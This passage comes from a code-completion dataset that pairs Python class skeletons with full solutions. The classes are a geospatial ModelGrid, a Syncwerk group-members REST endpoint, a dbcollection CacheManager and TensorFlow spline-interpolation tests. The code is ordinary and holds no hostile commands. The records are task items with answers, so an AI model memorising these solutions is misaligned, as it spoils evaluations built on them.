self.X[self.roi]\n roi_ys = self.Y[self.roi]\n self.roi_points = np.column_stack((roi_xs, roi_ys))\n self.roi_idxs = np.array(np.where(self.roi)).T\n self.roi_idxs_flat = np.where(self.roi.flat)[0]\n<|end_body_1|>\n", "revision_id": "c124c289f609cc5ab7751b3cbc8d14e52594ee1d", "skeleton": "<|skeleton|>\nclass ModelGrid:\n \"\"\"Container for storing model grid related variables.\"\"\"\n\n def prepare_coordinates(self):\n \"\"\"Prepare a range of variables related to the grid coordinates: - xs, ys: 1d-arrays containing the x and y coordinates in the grid CRS. 
- X, Y, 2d-arrays containing the x and y coordinates for each grid point. - all_points: (N, 2)-array containing (x, y) coordinates of all grid points. - roi_points: (N, 2)-array containing (x, y) coordinates of all ROI points. - roi_idxs: (N, 2)-array containing (row, col) indexes of all ROI points. - roi_idxs_flat: 1d-array containing the flattened (1d) indexes of all ROI points\"\"\"\n <|body_0|>\n\n def prepare_roi_coordinates(self):\n \"\"\"Update the roi_points and roi_idxs variables using the ROI field.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ModelGrid:\n \"\"\"Container for storing model grid related variables.\"\"\"\n\n def prepare_coordinates(self):\n \"\"\"Prepare a range of variables related to the grid coordinates: - xs, ys: 1d-arrays containing the x and y coordinates in the grid CRS. - X, Y, 2d-arrays containing the x and y coordinates for each grid point. - all_points: (N, 2)-array containing (x, y) coordinates of all grid points. - roi_points: (N, 2)-array containing (x, y) coordinates of all ROI points. - roi_idxs: (N, 2)-array containing (row, col) indexes of all ROI points. - roi_idxs_flat: 1d-array containing the flattened (1d) indexes of all ROI points\"\"\"\n transform = self.transform\n if transform.a < 0 or transform.e > 0:\n raise NotImplementedError\n x_min = transform.xoff\n x_max = x_min + self.cols * self.resolution\n y_max = transform.yoff\n y_min = y_max - self.rows * self.resolution\n x_range, y_range = rasterio.transform.xy(self.transform, [0, self.rows - 1], [0, self.cols - 1])\n xs = np.linspace(x_range[0], x_range[1], self.cols)\n ys = np.linspace(y_range[0], y_range[1], self.rows)\n X, Y = np.meshgrid(xs, ys)\n center_x = xs.mean()\n center_y = ys.mean()\n center_lon, center_lat = transform_coords(center_x, center_y, self.crs, constants.CRS_WGS84)\n self.x_min = x_min\n self.x_max = x_max\n self.y_min = y_min\n self.y_max = y_max\n self.xs = xs\n self.ys = ys\n self.X = X\n self.Y = Y\n self.all_points = np.column_stack((X.flat, Y.flat))\n self.center_lon = center_lon\n self.center_lat = center_lat\n self.prepare_roi_coordinates()\n\n def prepare_roi_coordinates(self):\n \"\"\"Update the roi_points and roi_idxs variables using the ROI field.\"\"\"\n if 'roi' not in self:\n self.roi = np.ones((self.rows, self.cols), dtype=bool)\n roi_xs = self.X[self.roi]\n roi_ys = self.Y[self.roi]\n self.roi_points = np.column_stack((roi_xs, roi_ys))\n self.roi_idxs = np.array(np.where(self.roi)).T\n self.roi_idxs_flat = np.where(self.roi.flat)[0]\n", "source": "the_stack_v2_python_sparse", "source_path": "openamundsen/util.py", "source_repo": "ripertio/openamundsen", "split": "test", "star_events_count": 0} {"blob_id": "9185c159e4bf7d09fe85272ae235f7210e097ca8", "bodies": ["try:\n avatar_size = int(request.GET.get('avatar_size', AVATAR_DEFAULT_SIZE))\nexcept ValueError:\n avatar_size = AVATAR_DEFAULT_SIZE\ntry:\n if not is_group_member(group_id, request.user.username):\n error_msg = 'Permission denied.'\n return api_error(status.HTTP_403_FORBIDDEN, error_msg)\n members = ccnet_api.get_group_members(group_id)\nexcept RpcsyncwerkError as e:\n logger.error(e)\n error_msg = 'Internal Server Error'\n return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)\ngroup_members = []\nis_admin = request.GET.get('is_admin', 'false')\nfor m in members:\n if is_admin == 'true' and (not m.is_staff):\n continue\n member_info = 
get_group_member_info(request, group_id, m.user_name, avatar_size)\n group_members.append(member_info)\nreturn Response(group_members)", "username = request.user.username\nif not is_group_admin_or_owner(group_id, username):\n error_msg = 'Permission denied.'\n return api_error(status.HTTP_403_FORBIDDEN, error_msg)\nemail = request.data.get('email', None)\ntry:\n User.objects.get(email=email)\nexcept User.DoesNotExist:\n error_msg = 'User %s not found.' % email\n return api_error(status.HTTP_404_NOT_FOUND, error_msg)\ntry:\n if is_group_member(group_id, email):\n error_msg = _(u'User %s is already a group member.') % email2nickname(email)\n return api_error(status.HTTP_400_BAD_REQUEST, error_msg)\n if is_org_context(request):\n org_id = request.user.org.org_id\n if not ccnet_api.org_user_exists(org_id, email):\n error_msg = _(u'User %s not found in organization.') % email2nickname(email)\n return api_error(status.HTTP_404_NOT_FOUND, error_msg)\n ccnet_api.group_add_member(group_id, username, email)\n add_user_to_group.send(sender=None, group_staff=username, group_id=group_id, added_user=email)\nexcept RpcsyncwerkError as e:\n logger.error(e)\n error_msg = 'Internal Server Error'\n return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)\nmember_info = get_group_member_info(request, group_id, email)\nreturn Response(member_info, status=status.HTTP_201_CREATED)"], "bodies_text": "<|body_start_0|>\n try:\n avatar_size = int(request.GET.get('avatar_size', AVATAR_DEFAULT_SIZE))\n except ValueError:\n avatar_size = AVATAR_DEFAULT_SIZE\n try:\n if not is_group_member(group_id, request.user.username):\n error_msg = 'Permission denied.'\n return api_error(status.HTTP_403_FORBIDDEN, error_msg)\n members = ccnet_api.get_group_members(group_id)\n except RpcsyncwerkError as e:\n logger.error(e)\n error_msg = 'Internal Server Error'\n return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)\n group_members = []\n is_admin = request.GET.get('is_admin', 'false')\n for m in members:\n if is_admin == 'true' and (not m.is_staff):\n continue\n member_info = get_group_member_info(request, group_id, m.user_name, avatar_size)\n group_members.append(member_info)\n return Response(group_members)\n<|end_body_0|>\n\n<|body_start_1|>\n username = request.user.username\n if not is_group_admin_or_owner(group_id, username):\n error_msg = 'Permission denied.'\n return api_error(status.HTTP_403_FORBIDDEN, error_msg)\n email = request.data.get('email', None)\n try:\n User.objects.get(email=email)\n except User.DoesNotExist:\n error_msg = 'User %s not found.' 
% email\n return api_error(status.HTTP_404_NOT_FOUND, error_msg)\n try:\n if is_group_member(group_id, email):\n error_msg = _(u'User %s is already a group member.') % email2nickname(email)\n return api_error(status.HTTP_400_BAD_REQUEST, error_msg)\n if is_org_context(request):\n org_id = request.user.org.org_id\n if not ccnet_api.org_user_exists(org_id, email):\n error_msg = _(u'User %s not found in organization.') % email2nickname(email)\n return api_error(status.HTTP_404_NOT_FOUND, error_msg)\n ccnet_api.group_add_member(group_id, username, email)\n add_user_to_group.send(sender=None, group_staff=username, group_id=group_id, added_user=email)\n except RpcsyncwerkError as e:\n logger.error(e)\n error_msg = 'Internal Server Error'\n return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)\n member_info = get_group_member_info(request, group_id, email)\n return Response(member_info, status=status.HTTP_201_CREATED)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "GroupMembers", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass GroupMembers:\n\n def get(self, request, group_id, format=None):\n \"\"\"Get all group members.\"\"\"\n <|body_0|>\n\n def post(self, request, group_id):\n \"\"\"Add a group member.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n avatar_size = int(request.GET.get('avatar_size', AVATAR_DEFAULT_SIZE))\n except ValueError:\n avatar_size = AVATAR_DEFAULT_SIZE\n try:\n if not is_group_member(group_id, request.user.username):\n error_msg = 'Permission denied.'\n return api_error(status.HTTP_403_FORBIDDEN, error_msg)\n members = ccnet_api.get_group_members(group_id)\n except RpcsyncwerkError as e:\n logger.error(e)\n error_msg = 'Internal Server Error'\n return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)\n group_members = []\n is_admin = request.GET.get('is_admin', 'false')\n for m in members:\n if is_admin == 'true' and (not m.is_staff):\n continue\n member_info = get_group_member_info(request, group_id, m.user_name, avatar_size)\n group_members.append(member_info)\n return Response(group_members)\n<|end_body_0|>\n\n<|body_start_1|>\n username = request.user.username\n if not is_group_admin_or_owner(group_id, username):\n error_msg = 'Permission denied.'\n return api_error(status.HTTP_403_FORBIDDEN, error_msg)\n email = request.data.get('email', None)\n try:\n User.objects.get(email=email)\n except User.DoesNotExist:\n error_msg = 'User %s not found.' 
% email\n return api_error(status.HTTP_404_NOT_FOUND, error_msg)\n try:\n if is_group_member(group_id, email):\n error_msg = _(u'User %s is already a group member.') % email2nickname(email)\n return api_error(status.HTTP_400_BAD_REQUEST, error_msg)\n if is_org_context(request):\n org_id = request.user.org.org_id\n if not ccnet_api.org_user_exists(org_id, email):\n error_msg = _(u'User %s not found in organization.') % email2nickname(email)\n return api_error(status.HTTP_404_NOT_FOUND, error_msg)\n ccnet_api.group_add_member(group_id, username, email)\n add_user_to_group.send(sender=None, group_staff=username, group_id=group_id, added_user=email)\n except RpcsyncwerkError as e:\n logger.error(e)\n error_msg = 'Internal Server Error'\n return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)\n member_info = get_group_member_info(request, group_id, email)\n return Response(member_info, status=status.HTTP_201_CREATED)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000007", "length_bytes": 12521, "license_type": "permissive", "methods": [{"docstring": "Get all group members.", "name": "get", "signature": "def get(self, request, group_id, format=None)"}, {"docstring": "Add a group member.", "name": "post", "signature": "def post(self, request, group_id)"}], "n_methods": 2, "prompt": "Implement the Python class `GroupMembers` described below.\n\nClass description:\nImplement the GroupMembers class.\n\nMethod signatures and docstrings:\n- def get(self, request, group_id, format=None): Get all group members.\n- def post(self, request, group_id): Add a group member.", "prompted_full_text": "Implement the Python class `GroupMembers` described below.\n\nClass description:\nImplement the GroupMembers class.\n\nMethod signatures and docstrings:\n- def get(self, request, group_id, format=None): Get all group members.\n- def post(self, request, group_id): Add a group member.\n\n<|skeleton|>\nclass GroupMembers:\n\n def get(self, request, group_id, format=None):\n \"\"\"Get all group members.\"\"\"\n <|body_0|>\n\n def post(self, request, group_id):\n \"\"\"Add a group member.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n avatar_size = int(request.GET.get('avatar_size', AVATAR_DEFAULT_SIZE))\n except ValueError:\n avatar_size = AVATAR_DEFAULT_SIZE\n try:\n if not is_group_member(group_id, request.user.username):\n error_msg = 'Permission denied.'\n return api_error(status.HTTP_403_FORBIDDEN, error_msg)\n members = ccnet_api.get_group_members(group_id)\n except RpcsyncwerkError as e:\n logger.error(e)\n error_msg = 'Internal Server Error'\n return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)\n group_members = []\n is_admin = request.GET.get('is_admin', 'false')\n for m in members:\n if is_admin == 'true' and (not m.is_staff):\n continue\n member_info = get_group_member_info(request, group_id, m.user_name, avatar_size)\n group_members.append(member_info)\n return Response(group_members)\n<|end_body_0|>\n\n<|body_start_1|>\n username = request.user.username\n if not is_group_admin_or_owner(group_id, username):\n error_msg = 'Permission denied.'\n return api_error(status.HTTP_403_FORBIDDEN, error_msg)\n email = request.data.get('email', None)\n try:\n User.objects.get(email=email)\n except User.DoesNotExist:\n error_msg = 'User %s not found.' 
% email\n return api_error(status.HTTP_404_NOT_FOUND, error_msg)\n try:\n if is_group_member(group_id, email):\n error_msg = _(u'User %s is already a group member.') % email2nickname(email)\n return api_error(status.HTTP_400_BAD_REQUEST, error_msg)\n if is_org_context(request):\n org_id = request.user.org.org_id\n if not ccnet_api.org_user_exists(org_id, email):\n error_msg = _(u'User %s not found in organization.') % email2nickname(email)\n return api_error(status.HTTP_404_NOT_FOUND, error_msg)\n ccnet_api.group_add_member(group_id, username, email)\n add_user_to_group.send(sender=None, group_staff=username, group_id=group_id, added_user=email)\n except RpcsyncwerkError as e:\n logger.error(e)\n error_msg = 'Internal Server Error'\n return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)\n member_info = get_group_member_info(request, group_id, email)\n return Response(member_info, status=status.HTTP_201_CREATED)\n<|end_body_1|>\n", "revision_id": "13b3ed26a04248211ef91ca70dccc617be27a3c3", "skeleton": "<|skeleton|>\nclass GroupMembers:\n\n def get(self, request, group_id, format=None):\n \"\"\"Get all group members.\"\"\"\n <|body_0|>\n\n def post(self, request, group_id):\n \"\"\"Add a group member.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class GroupMembers:\n def get(self, request, group_id, format=None):\n \"\"\"Get all group members.\"\"\"\n try:\n avatar_size = int(request.GET.get('avatar_size', AVATAR_DEFAULT_SIZE))\n except ValueError:\n avatar_size = AVATAR_DEFAULT_SIZE\n try:\n if not is_group_member(group_id, request.user.username):\n error_msg = 'Permission denied.'\n return api_error(status.HTTP_403_FORBIDDEN, error_msg)\n members = ccnet_api.get_group_members(group_id)\n except RpcsyncwerkError as e:\n logger.error(e)\n error_msg = 'Internal Server Error'\n return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)\n group_members = []\n is_admin = request.GET.get('is_admin', 'false')\n for m in members:\n if is_admin == 'true' and (not m.is_staff):\n continue\n member_info = get_group_member_info(request, group_id, m.user_name, avatar_size)\n group_members.append(member_info)\n return Response(group_members)\n\n def post(self, request, group_id):\n \"\"\"Add a group member.\"\"\"\n username = request.user.username\n if not is_group_admin_or_owner(group_id, username):\n error_msg = 'Permission denied.'\n return api_error(status.HTTP_403_FORBIDDEN, error_msg)\n email = request.data.get('email', None)\n try:\n User.objects.get(email=email)\n except User.DoesNotExist:\n error_msg = 'User %s not found.' 
% email\n return api_error(status.HTTP_404_NOT_FOUND, error_msg)\n try:\n if is_group_member(group_id, email):\n error_msg = _(u'User %s is already a group member.') % email2nickname(email)\n return api_error(status.HTTP_400_BAD_REQUEST, error_msg)\n if is_org_context(request):\n org_id = request.user.org.org_id\n if not ccnet_api.org_user_exists(org_id, email):\n error_msg = _(u'User %s not found in organization.') % email2nickname(email)\n return api_error(status.HTTP_404_NOT_FOUND, error_msg)\n ccnet_api.group_add_member(group_id, username, email)\n add_user_to_group.send(sender=None, group_staff=username, group_id=group_id, added_user=email)\n except RpcsyncwerkError as e:\n logger.error(e)\n error_msg = 'Internal Server Error'\n return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)\n member_info = get_group_member_info(request, group_id, email)\n return Response(member_info, status=status.HTTP_201_CREATED)\n", "source": "the_stack_v2_python_sparse", "source_path": "fhs/usr/share/python/syncwerk/restapi/restapi/api2/endpoints/group_members.py", "source_repo": "syncwerk/syncwerk-server-restapi", "split": "test", "star_events_count": 0} {"blob_id": "be2966afca7a5675553033b35d517fafff6304d0", "bodies": ["self.manager = CacheDataManager()\nself.info = CacheManagerInfo(self.manager)\nself.dataset = CacheManagerDataset(self.manager)\nself.task = CacheManagerTask(self.manager)\nself.category = CacheManagerCategory(self.manager)", "self.info.info()\nself.dataset.info()\nself.category.info()"], "bodies_text": "<|body_start_0|>\n self.manager = CacheDataManager()\n self.info = CacheManagerInfo(self.manager)\n self.dataset = CacheManagerDataset(self.manager)\n self.task = CacheManagerTask(self.manager)\n self.category = CacheManagerCategory(self.manager)\n<|end_body_0|>\n\n<|body_start_1|>\n self.info.info()\n self.dataset.info()\n self.category.info()\n<|end_body_1|>\n", "class_docstring": "Manage dbcollection configurations and stores them inside a cache file stored in disk. Attributes ---------- cache_filename : str Cache file path + name. cache_dir : str Default directory to store all dataset's metadata files. download_dir : str Default save dir path for downloaded data. data : dict Cache contents.", "class_name": "CacheManager", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CacheManager:\n \"\"\"Manage dbcollection configurations and stores them inside a cache file stored in disk. Attributes ---------- cache_filename : str Cache file path + name. cache_dir : str Default directory to store all dataset's metadata files. download_dir : str Default save dir path for downloaded data. 
data : dict Cache contents.\"\"\"\n\n def __init__(self):\n \"\"\"Initializes the class.\"\"\"\n <|body_0|>\n\n def info_cache(self):\n \"\"\"Prints the information of the cache.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.manager = CacheDataManager()\n self.info = CacheManagerInfo(self.manager)\n self.dataset = CacheManagerDataset(self.manager)\n self.task = CacheManagerTask(self.manager)\n self.category = CacheManagerCategory(self.manager)\n<|end_body_0|>\n\n<|body_start_1|>\n self.info.info()\n self.dataset.info()\n self.category.info()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000008", "length_bytes": 33479, "license_type": "permissive", "methods": [{"docstring": "Initializes the class.", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Prints the information of the cache.", "name": "info_cache", "signature": "def info_cache(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004745", "prompt": "Implement the Python class `CacheManager` described below.\n\nClass description:\nManage dbcollection configurations and stores them inside a cache file stored in disk. Attributes ---------- cache_filename : str Cache file path + name. cache_dir : str Default directory to store all dataset's metadata files. download_dir : str Default save dir path for downloaded data. data : dict Cache contents.\n\nMethod signatures and docstrings:\n- def __init__(self): Initializes the class.\n- def info_cache(self): Prints the information of the cache.", "prompted_full_text": "Implement the Python class `CacheManager` described below.\n\nClass description:\nManage dbcollection configurations and stores them inside a cache file stored in disk. Attributes ---------- cache_filename : str Cache file path + name. cache_dir : str Default directory to store all dataset's metadata files. download_dir : str Default save dir path for downloaded data. data : dict Cache contents.\n\nMethod signatures and docstrings:\n- def __init__(self): Initializes the class.\n- def info_cache(self): Prints the information of the cache.\n\n<|skeleton|>\nclass CacheManager:\n \"\"\"Manage dbcollection configurations and stores them inside a cache file stored in disk. Attributes ---------- cache_filename : str Cache file path + name. cache_dir : str Default directory to store all dataset's metadata files. download_dir : str Default save dir path for downloaded data. data : dict Cache contents.\"\"\"\n\n def __init__(self):\n \"\"\"Initializes the class.\"\"\"\n <|body_0|>\n\n def info_cache(self):\n \"\"\"Prints the information of the cache.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.manager = CacheDataManager()\n self.info = CacheManagerInfo(self.manager)\n self.dataset = CacheManagerDataset(self.manager)\n self.task = CacheManagerTask(self.manager)\n self.category = CacheManagerCategory(self.manager)\n<|end_body_0|>\n\n<|body_start_1|>\n self.info.info()\n self.dataset.info()\n self.category.info()\n<|end_body_1|>\n", "revision_id": "e0be95d941b50a5b2e27ffa1c5be20dc6aa2d6a1", "skeleton": "<|skeleton|>\nclass CacheManager:\n \"\"\"Manage dbcollection configurations and stores them inside a cache file stored in disk. Attributes ---------- cache_filename : str Cache file path + name. cache_dir : str Default directory to store all dataset's metadata files. download_dir : str Default save dir path for downloaded data. 
data : dict Cache contents.\"\"\"\n\n def __init__(self):\n \"\"\"Initializes the class.\"\"\"\n <|body_0|>\n\n def info_cache(self):\n \"\"\"Prints the information of the cache.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CacheManager:\n \"\"\"Manage dbcollection configurations and stores them inside a cache file stored in disk. Attributes ---------- cache_filename : str Cache file path + name. cache_dir : str Default directory to store all dataset's metadata files. download_dir : str Default save dir path for downloaded data. data : dict Cache contents.\"\"\"\n\n def __init__(self):\n \"\"\"Initializes the class.\"\"\"\n self.manager = CacheDataManager()\n self.info = CacheManagerInfo(self.manager)\n self.dataset = CacheManagerDataset(self.manager)\n self.task = CacheManagerTask(self.manager)\n self.category = CacheManagerCategory(self.manager)\n\n def info_cache(self):\n \"\"\"Prints the information of the cache.\"\"\"\n self.info.info()\n self.dataset.info()\n self.category.info()\n", "source": "the_stack_v2_python_sparse", "source_path": "dbcollection/core/manager.py", "source_repo": "dbcollection/dbcollection", "split": "test", "star_events_count": 25} {"blob_id": "6a666f5804ac00505ab358797d6e3182fd57620a", "bodies": ["tp = _QuadraticPlusSinProblem1D()\nquery_points, _, train_points, train_values = tp.get_problem(extrapolate=False, dtype='float64')\ninterpolation_order = 1\nwith ops.name_scope('interpolator'):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, interpolation_order)\n with self.test_session() as sess:\n fetches = [query_points, train_points, train_values, interpolator]\n query_points_, train_points_, train_values_, interp_ = sess.run(fetches)\n interp_ = interp_[0, :, 0]\n query_points_ = query_points_[0, :, 0]\n train_points_ = train_points_[0, :, 0]\n train_values_ = train_values_[0, :, 0]\n scipy_interp_function = sc_interpolate.interp1d(train_points_, train_values_, kind='linear')\n scipy_interpolation = scipy_interp_function(query_points_)\n scipy_interpolation_on_train = scipy_interp_function(train_points_)\n tol = 0.001\n self.assertAllClose(train_values_, scipy_interpolation_on_train, atol=tol, rtol=tol)\n self.assertAllClose(interp_, scipy_interpolation, atol=tol, rtol=tol)", "tp = _QuadraticPlusSinProblem1D()\nquery_points, _, train_points, train_values = tp.get_problem(dtype='float64')\nfor order in (1, 2, 3):\n for reg_weight in (0, 0.01):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, order, reg_weight)\n target_interpolation = tp.HARDCODED_QUERY_VALUES[order, reg_weight]\n target_interpolation = np.array(target_interpolation)\n with self.test_session() as sess:\n interp_val = sess.run(interpolator)\n self.assertAllClose(interp_val[0, :, 0], target_interpolation)", "tp = _QuadraticPlusSinProblemND()\nquery_points, _, train_points, train_values = tp.get_problem(dtype='float64')\nfor order in (1, 2, 3):\n for reg_weight in (0, 0.01):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, order, reg_weight)\n target_interpolation = tp.HARDCODED_QUERY_VALUES[order, reg_weight]\n target_interpolation = np.array(target_interpolation)\n with self.test_session() as sess:\n interp_val = sess.run(interpolator)\n self.assertAllClose(interp_val[0, :, 0], target_interpolation)", "tp = 
_QuadraticPlusSinProblemND()\nquery_points, query_values, train_points, train_values = tp.get_problem(optimizable=True)\nregularization = 0.001\nfor interpolation_order in (1, 2, 3, 4):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, interpolation_order, regularization)\n loss = math_ops.reduce_mean(math_ops.square(query_values - interpolator))\n optimizer = momentum.MomentumOptimizer(0.001, 0.9)\n grad = gradients.gradients(loss, [train_points])\n grad, _ = clip_ops.clip_by_global_norm(grad, 1.0)\n opt_func = optimizer.apply_gradients(zip(grad, [train_points]))\n init_op = variables.global_variables_initializer()\n with self.test_session() as sess:\n sess.run(init_op)\n for _ in range(100):\n sess.run([loss, opt_func])"], "bodies_text": "<|body_start_0|>\n tp = _QuadraticPlusSinProblem1D()\n query_points, _, train_points, train_values = tp.get_problem(extrapolate=False, dtype='float64')\n interpolation_order = 1\n with ops.name_scope('interpolator'):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, interpolation_order)\n with self.test_session() as sess:\n fetches = [query_points, train_points, train_values, interpolator]\n query_points_, train_points_, train_values_, interp_ = sess.run(fetches)\n interp_ = interp_[0, :, 0]\n query_points_ = query_points_[0, :, 0]\n train_points_ = train_points_[0, :, 0]\n train_values_ = train_values_[0, :, 0]\n scipy_interp_function = sc_interpolate.interp1d(train_points_, train_values_, kind='linear')\n scipy_interpolation = scipy_interp_function(query_points_)\n scipy_interpolation_on_train = scipy_interp_function(train_points_)\n tol = 0.001\n self.assertAllClose(train_values_, scipy_interpolation_on_train, atol=tol, rtol=tol)\n self.assertAllClose(interp_, scipy_interpolation, atol=tol, rtol=tol)\n<|end_body_0|>\n\n<|body_start_1|>\n tp = _QuadraticPlusSinProblem1D()\n query_points, _, train_points, train_values = tp.get_problem(dtype='float64')\n for order in (1, 2, 3):\n for reg_weight in (0, 0.01):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, order, reg_weight)\n target_interpolation = tp.HARDCODED_QUERY_VALUES[order, reg_weight]\n target_interpolation = np.array(target_interpolation)\n with self.test_session() as sess:\n interp_val = sess.run(interpolator)\n self.assertAllClose(interp_val[0, :, 0], target_interpolation)\n<|end_body_1|>\n\n<|body_start_2|>\n tp = _QuadraticPlusSinProblemND()\n query_points, _, train_points, train_values = tp.get_problem(dtype='float64')\n for order in (1, 2, 3):\n for reg_weight in (0, 0.01):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, order, reg_weight)\n target_interpolation = tp.HARDCODED_QUERY_VALUES[order, reg_weight]\n target_interpolation = np.array(target_interpolation)\n with self.test_session() as sess:\n interp_val = sess.run(interpolator)\n self.assertAllClose(interp_val[0, :, 0], target_interpolation)\n<|end_body_2|>\n\n<|body_start_3|>\n tp = _QuadraticPlusSinProblemND()\n query_points, query_values, train_points, train_values = tp.get_problem(optimizable=True)\n regularization = 0.001\n for interpolation_order in (1, 2, 3, 4):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, interpolation_order, regularization)\n loss = math_ops.reduce_mean(math_ops.square(query_values - interpolator))\n optimizer = momentum.MomentumOptimizer(0.001, 0.9)\n grad = 
gradients.gradients(loss, [train_points])\n grad, _ = clip_ops.clip_by_global_norm(grad, 1.0)\n opt_func = optimizer.apply_gradients(zip(grad, [train_points]))\n init_op = variables.global_variables_initializer()\n with self.test_session() as sess:\n sess.run(init_op)\n for _ in range(100):\n sess.run([loss, opt_func])\n<|end_body_3|>\n", "class_docstring": "", "class_name": "InterpolateSplineTest", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass InterpolateSplineTest:\n\n def test_1d_linear_interpolation(self):\n \"\"\"For 1d linear interpolation, we can compare directly to scipy.\"\"\"\n <|body_0|>\n\n def test_1d_interpolation(self):\n \"\"\"Regression test for interpolation with 1-D points.\"\"\"\n <|body_1|>\n\n def test_nd_linear_interpolation(self):\n \"\"\"Regression test for interpolation with N-D points.\"\"\"\n <|body_2|>\n\n def test_interpolation_gradient(self):\n \"\"\"Make sure that backprop can run. Correctness of gradients is assumed. Here, we create a use a small 'training' set and a more densely-sampled set of query points, for which we know the true value in advance. The goal is to choose x locations for the training data such that interpolating using this training data yields the best reconstruction for the function values at the query points. The training data locations are optimized iteratively using gradient descent.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n tp = _QuadraticPlusSinProblem1D()\n query_points, _, train_points, train_values = tp.get_problem(extrapolate=False, dtype='float64')\n interpolation_order = 1\n with ops.name_scope('interpolator'):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, interpolation_order)\n with self.test_session() as sess:\n fetches = [query_points, train_points, train_values, interpolator]\n query_points_, train_points_, train_values_, interp_ = sess.run(fetches)\n interp_ = interp_[0, :, 0]\n query_points_ = query_points_[0, :, 0]\n train_points_ = train_points_[0, :, 0]\n train_values_ = train_values_[0, :, 0]\n scipy_interp_function = sc_interpolate.interp1d(train_points_, train_values_, kind='linear')\n scipy_interpolation = scipy_interp_function(query_points_)\n scipy_interpolation_on_train = scipy_interp_function(train_points_)\n tol = 0.001\n self.assertAllClose(train_values_, scipy_interpolation_on_train, atol=tol, rtol=tol)\n self.assertAllClose(interp_, scipy_interpolation, atol=tol, rtol=tol)\n<|end_body_0|>\n\n<|body_start_1|>\n tp = _QuadraticPlusSinProblem1D()\n query_points, _, train_points, train_values = tp.get_problem(dtype='float64')\n for order in (1, 2, 3):\n for reg_weight in (0, 0.01):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, order, reg_weight)\n target_interpolation = tp.HARDCODED_QUERY_VALUES[order, reg_weight]\n target_interpolation = np.array(target_interpolation)\n with self.test_session() as sess:\n interp_val = sess.run(interpolator)\n self.assertAllClose(interp_val[0, :, 0], target_interpolation)\n<|end_body_1|>\n\n<|body_start_2|>\n tp = _QuadraticPlusSinProblemND()\n query_points, _, train_points, train_values = tp.get_problem(dtype='float64')\n for order in (1, 2, 3):\n for reg_weight in (0, 0.01):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, order, reg_weight)\n target_interpolation = tp.HARDCODED_QUERY_VALUES[order, reg_weight]\n 
target_interpolation = np.array(target_interpolation)\n with self.test_session() as sess:\n interp_val = sess.run(interpolator)\n self.assertAllClose(interp_val[0, :, 0], target_interpolation)\n<|end_body_2|>\n\n<|body_start_3|>\n tp = _QuadraticPlusSinProblemND()\n query_points, query_values, train_points, train_values = tp.get_problem(optimizable=True)\n regularization = 0.001\n for interpolation_order in (1, 2, 3, 4):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, interpolation_order, regularization)\n loss = math_ops.reduce_mean(math_ops.square(query_values - interpolator))\n optimizer = momentum.MomentumOptimizer(0.001, 0.9)\n grad = gradients.gradients(loss, [train_points])\n grad, _ = clip_ops.clip_by_global_norm(grad, 1.0)\n opt_func = optimizer.apply_gradients(zip(grad, [train_points]))\n init_op = variables.global_variables_initializer()\n with self.test_session() as sess:\n sess.run(init_op)\n for _ in range(100):\n sess.run([loss, opt_func])\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000009", "length_bytes": 10269, "license_type": "permissive", "methods": [{"docstring": "For 1d linear interpolation, we can compare directly to scipy.", "name": "test_1d_linear_interpolation", "signature": "def test_1d_linear_interpolation(self)"}, {"docstring": "Regression test for interpolation with 1-D points.", "name": "test_1d_interpolation", "signature": "def test_1d_interpolation(self)"}, {"docstring": "Regression test for interpolation with N-D points.", "name": "test_nd_linear_interpolation", "signature": "def test_nd_linear_interpolation(self)"}, {"docstring": "Make sure that backprop can run. Correctness of gradients is assumed. Here, we create 